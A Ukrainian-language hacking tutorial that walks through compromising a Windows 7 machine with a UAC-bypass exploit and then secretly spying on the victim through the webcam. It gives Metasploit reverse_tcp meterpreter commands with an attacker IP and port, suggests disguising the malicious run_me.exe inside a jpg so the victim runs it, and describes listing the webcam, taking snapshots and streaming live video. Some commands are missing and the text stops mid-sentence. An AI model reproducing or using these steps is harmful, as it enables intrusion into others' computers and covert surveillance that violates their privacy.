Всім привіт!
Давайте сьогодні поговоримо про один з можливих зломів Windows 7, плюс до всього будемо підглядати через web-камеру.
Web-камера давним давно стала невід’ємною частиною апаратного забезпечення комп’ютера і не важливо ноутбук це або стаціонар. До того ж великий відсоток користувачів до цих пір використовують Windows XP і Windows 7, на які вразливостей вище даху. До всього цього можна додати невміння користувачами налаштовувати свою ОС, що вже грає важливу роль!
Отже, давайте скористаємося однією з давно знайдених, але досі працюють вразливостей для Windows 7, яка зачіпає UAC (User Account Control). Він нею ви можете прочитати:
Windows zero-day flaw bypasses UAC!
New Windows Vulnerability Bypasses UAC
Bypassing UAC with User Privilege under Windows Vista/7
Уразливість User Account Control (UAC) в Windows 7
Для початку нам потрібно створити шкідливий виконуваний файл run_me.exe, який в BackTrack створюється так, як показано нижче:
● LHOST=192.168.1.5 – IP-адреса атакуючого
● LPORT=4444 – порт атакуючого
Запускаємо Metasploit:
Далі вводимо команди:
> set payload windows/meterpreter/reverse_tcp
> set lhost 192.168.1.5
> exploit
Тепер нам потрібно, що користувач запустив файл run_me.exe. Як це добитися вже інша історія, як варіант можна засунути шкідливий файл в інший файл. Наприклад, приховати/склеїти exe-файлу в jpg. Це не єдиний варіант, тому озброюйтесь googl’ом.
Після того, коли жертва запустить файл, ми отримаємо контроль над системою з привілеями SYSTEM. Тепер можна робити все, що завгодно! Але зараз будемо підглядати за користувачем.
Спочатку подивимося, чи є взагалі у нього web-камера?
1: Logitech Webcam 120
Та нам пощастило! Є одна web-камера: Logitech Webcam 120.
Тепер зробимо знімок:
Так само можна спробувати запустити web-камеру в режимі реального часу. Робиться це наступною командою
Після чого відкриється браузер і ви будете бачити те, що бачить камера. Якщо браузер не відкриється, значить відкрийте його самі і в адресному рядку введіть:
